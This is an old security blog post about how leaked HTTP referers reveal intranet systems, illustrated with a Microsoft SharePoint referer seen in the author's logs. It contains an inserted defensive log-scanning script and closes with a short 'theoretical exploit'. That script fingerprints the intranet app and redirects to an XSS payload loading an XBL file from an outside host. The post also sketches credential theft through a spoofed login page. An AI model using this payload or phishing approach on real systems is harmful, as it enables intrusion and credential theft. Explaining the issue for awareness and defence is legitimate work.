Theoretical Cross Referer Attack On Microsoft.
Published on: 1193676203
So, Microsoft visited me once again. And yes, I see everything that happens on this site through my logs. Again, they sent their referer to me. I can tell you now that this is a bad idea. I have talked about it before, and amazingly people continue to send their referer. So, instead of complaining again, I'll show you how Microsoft could be owned based on nothing more than the referer they send. Please understand: turn off the referer string inside your browser, because this can and will hurt you someday. With this I also mean feed readers, Google, GMail, Hotmail et al.
First, 131.107.0.105 (tide535.microsoft.com) dropped by, leaving this referer string in the logs: http://sharepoint/sites/SVT/Portal/Lists/Issues/DispForm1.aspx?List={a hash}&ID=142
Okay, so it uses SharePoint. SharePoint is or was vulnerable to XSS to some degree, and there are probably more (network) vulnerabilities to Google for. Let's use the XSS and write only a simple piece of JavaScript to launch a quick attack. In the example below I also look for Novell, because Novell has an XSS vulnerability as well. In a real attack we could launch this script as a pop-under, so that when they switch browser tabs, they'll end up on their intranet, because that is where they came from, as we saw in the referer. Then again, we can always open a second browser tab and serve a spoofed SharePoint page. Since they came from a similar service, they could think the spoofed page we opened is the page they originated from, and we can steal credentials there. Anyway, it is possible with such little means.
So, again, the moral of this whole thing is that you SHOULD disable the referer string, because it allows me to pinpoint a certain system and to tell whether you are still logged into it. Please do not trivialize this issue: I successfully abused this once by launching an SQL injection attack through a referer string. Yes, SQL injection can be performed on a GET request inside an iframe as well, if I detect that SQL Server or MySQL is running. I am sorry to say this, but if you work in the security business you should know better!
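The defender's side of the log reading described above, added here as an example that is not part of the original post: it parses Apache combined-format access-log lines and flags Referer values that point at an intranet location (a single-label hostname such as "sharepoint", a private or loopback address, or an internal DNS suffix), which is exactly how the hit quoted above would have stood out. The log lines, client addresses, hosts and paths are constructed for this example; only the first line's referer mirrors the shape of the one quoted in the post. The suffix list is an assumption and should be extended with whatever naming an organization actually uses internally.

```javascript
// Added example, not code from the original post. Scans Apache "combined" access-log
// lines for Referer headers that leak an intranet location.

// Constructed sample log lines; clients, hosts and paths are made up for this example.
// Only the first line's referer mirrors the shape of the one quoted in the post.
const SAMPLE_LOG = [
  '192.0.2.10 - - [29/Oct/2007:16:43:23 +0000] "GET /post.html HTTP/1.1" 200 512 "http://sharepoint/sites/SVT/Portal/Lists/Issues/DispForm1.aspx?List={a hash}&ID=142" "Mozilla/5.0"',
  '198.51.100.7 - - [29/Oct/2007:16:44:01 +0000] "GET /post.html HTTP/1.1" 200 512 "http://www.google.com/search?q=referer" "Mozilla/5.0"',
  '203.0.113.9 - - [29/Oct/2007:16:45:10 +0000] "GET /feed.xml HTTP/1.1" 200 2048 "-" "FeedReader/1.0"',
  '192.0.2.33 - - [29/Oct/2007:16:46:30 +0000] "GET /post.html HTTP/1.1" 200 512 "http://192.168.1.20/servlet/webacc?User.Id=jdoe" "Mozilla/5.0"',
  '192.0.2.34 - - [29/Oct/2007:16:47:05 +0000] "GET /post.html HTTP/1.1" 200 512 "http://wiki.intranet.corp/Display.aspx?page=42" "Mozilla/5.0"',
];

// Apache combined log format:
// client ident user [time] "request" status bytes "referer" "user-agent"
const LOG_RE = /^(\S+) (\S+) (\S+) \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

function parseLogLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null; // not combined format, skip it
  return {
    client: m[1],
    time: m[4],
    request: m[5],
    status: Number(m[6]),
    referer: m[8],
    userAgent: m[9],
  };
}

// RFC 1918 private ranges plus loopback; these never belong in a public referer.
function isPrivateIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]);
  const b = Number(m[2]);
  return a === 10 || a === 127 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Assumed internal naming suffixes; adjust to the organization being assessed.
const INTERNAL_SUFFIXES = ['.local', '.internal', '.corp', '.lan', '.intranet'];

// Decide whether a referer URL exposes an intranet host. Returns null for an
// absent referer ("-"), otherwise an object with a leak flag and the reason.
function classifyReferer(referer) {
  if (!referer || referer === '-') return null;
  let url;
  try {
    url = new URL(referer);
  } catch (e) {
    return { leak: false, reason: 'unparseable referer' };
  }
  const host = url.hostname.toLowerCase();
  let reason = null;
  if (host === 'localhost' || isPrivateIPv4(host)) {
    reason = 'private or loopback address';
  } else if (!host.includes('.')) {
    reason = 'single-label intranet hostname';
  } else if (INTERNAL_SUFFIXES.some((s) => host.endsWith(s))) {
    reason = 'internal DNS suffix';
  }
  if (!reason) return { leak: false, host };
  // Path and query are reported too: they often carry document or user identifiers.
  return { leak: true, host, path: url.pathname, hasQuery: url.search.length > 0, reason };
}

// Walk the log and collect every request whose referer leaks an internal location.
function findLeakedReferers(lines) {
  const findings = [];
  for (const line of lines) {
    const entry = parseLogLine(line);
    if (!entry) continue;
    const verdict = classifyReferer(entry.referer);
    if (verdict && verdict.leak) {
      findings.push({ client: entry.client, ...verdict });
    }
  }
  return findings;
}

console.log(JSON.stringify(findLeakedReferers(SAMPLE_LOG), null, 2));
```

Run over a real access log, the output is the list of visitors whose browsers gave away where they came from, together with the internal host and path, which is the vantage point the post is written from. On the intranet side, the leak can also be stopped at the source: modern browsers honour the Referrer-Policy response header (for example no-referrer), so an internal application that sets it stops sending its URLs to outside sites regardless of how users have configured their browsers.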
Theoretical exploit:
<script>
// Fingerprint the intranet application from nothing but the leaked referer.
var ref = document.referrer;
var sharepoint = false;
var novell = false;
if(ref.search(/sharepoint/i) != -1) {
    sharepoint = true;
}
if(ref.search(/servlet/i) != -1) {
    novell = true;
}
if(sharepoint) {
    try {
        var uri = 'http://127.0.0.1/default.aspx/';
        // Reflected XSS payload; -moz-binding (XBL) only ever worked in Firefox.
        var payload1 = '"><STYLE>BODY{-moz-binding:url("http://0x000000.com/xss.xml#xss")}</STYLE><"';
        location.href = uri+payload1;
    } catch(e) {
        var uri = false;
    }
}
if(novell) {
    try {
        var uri = 'http://127.0.0.1/servlet/webacc?User.Id=';
        var payload1 = '"><STYLE>BODY{-moz-binding:url("http://0x000000.com/xss.xml#xss")}</STYLE><"';
        location.href = uri+payload1;
    } catch(e) {
        var uri = false;
    }
}
</script>